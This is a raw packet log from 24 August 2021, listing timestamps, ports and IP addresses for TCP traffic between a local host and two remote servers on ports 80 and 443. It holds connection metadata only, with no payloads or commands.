Aug 24, 2021 08:46:56.569108963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569118977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569140911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569142103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569160938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569183111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569201946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569202900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569224119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569230080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569246054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569264889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569272041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569288969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569310904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569319963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569331884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569354057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569375992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569396973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569399118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569405079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569422007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569442987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569467068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569468021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569490910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569499016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569510937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569533110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569541931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569555998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569570065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569578886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569598913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569621086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569626093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569644928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569668055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569686890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569688082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569710016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569715977 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569731951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569745064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569753885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569820881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.570892096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592190981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592221022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592245102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592263937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592284918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592307091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592327118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592348099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592370033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592395067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592418909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592438936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592463017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592398882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592483997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592535019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592556000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592576027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592600107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592622042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592643023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592664003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592684031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592686892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592689991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592715979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592716932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592720032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592736959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592757940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592757940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592782021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592782021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592784882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592804909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592820883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592824936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592845917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592847109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592865944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592886925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592907906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592909098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592930079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592931032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592935085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592938900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592941999 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592947960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592967987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.592976093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592997074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.592999935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593018055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593039036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593043089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593060017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593072891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593080997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593102932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593127012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593138933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593148947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593169928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593169928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593192101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593215942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593233109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593235970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593257904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593266010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593278885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593302011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593322992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593332052 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593343973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593352079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593364954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593385935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593398094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593405962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593426943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593430996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593446970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593471050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593472004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593493938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593513012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593523979 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593533993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593554974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593556881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593576908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593597889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593619108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593621969 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593641996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593647957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593663931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593683004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.593683958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.593736887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.594484091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.600569963 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:56.615624905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615648985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615660906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615678072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615694046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615711927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615722895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615741968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615758896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615772009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615788937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615809917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615828037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615845919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615863085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615890026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615907907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615921021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615938902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615959883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615976095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.615997076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616009951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616023064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616035938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616049051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616061926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616075039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616086960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616100073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616111994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616128922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616142035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616153955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616154909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.616170883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616183996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616205931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616226912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616242886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616261005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616276979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616293907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616311073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616327047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616383076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616400957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616410971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.616417885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616435051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616455078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616472960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616489887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616502047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.616518021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616530895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616568089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.616575003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616591930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616606951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616621971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.616624117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616641045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616662025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616678953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616687059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.616695881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616712093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616729021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616744041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616760969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616776943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.616786003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.616859913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.623558998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.628288031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.638747931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.638797998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.638827085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.638860941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.638887882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.638891935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.638919115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.638947964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.638956070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.638981104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.638983965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639014959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639040947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639061928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639072895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639096975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639107943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639168024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639204979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639231920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639234066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639260054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639266014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639297962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639328003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639347076 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639360905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639378071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639395952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639431000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639478922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639492989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639496088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639523029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639527082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639573097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639590025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639609098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639620066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639626026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639642000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639656067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639657974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639674902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639682055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639689922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639703035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639707088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639723063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639736891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639743090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639760971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639770031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639776945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639794111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639811039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639818907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639827013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639842033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639853001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639858961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639872074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639878035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639895916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639903069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639911890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639929056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639936924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.639946938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639961958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639978886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.639978886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640024900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640026093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640043974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640059948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640068054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640075922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640091896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640104055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640132904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640136003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640156984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640173912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640206099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640223980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640233994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640239954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640259027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640269041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640278101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640285015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640294075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640311003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640319109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640327930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640343904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640348911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640361071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640377998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.640389919 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.640412092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.645543098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.649552107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.662746906 CEST	80	49715	212.224.105.79	192.168.2.7
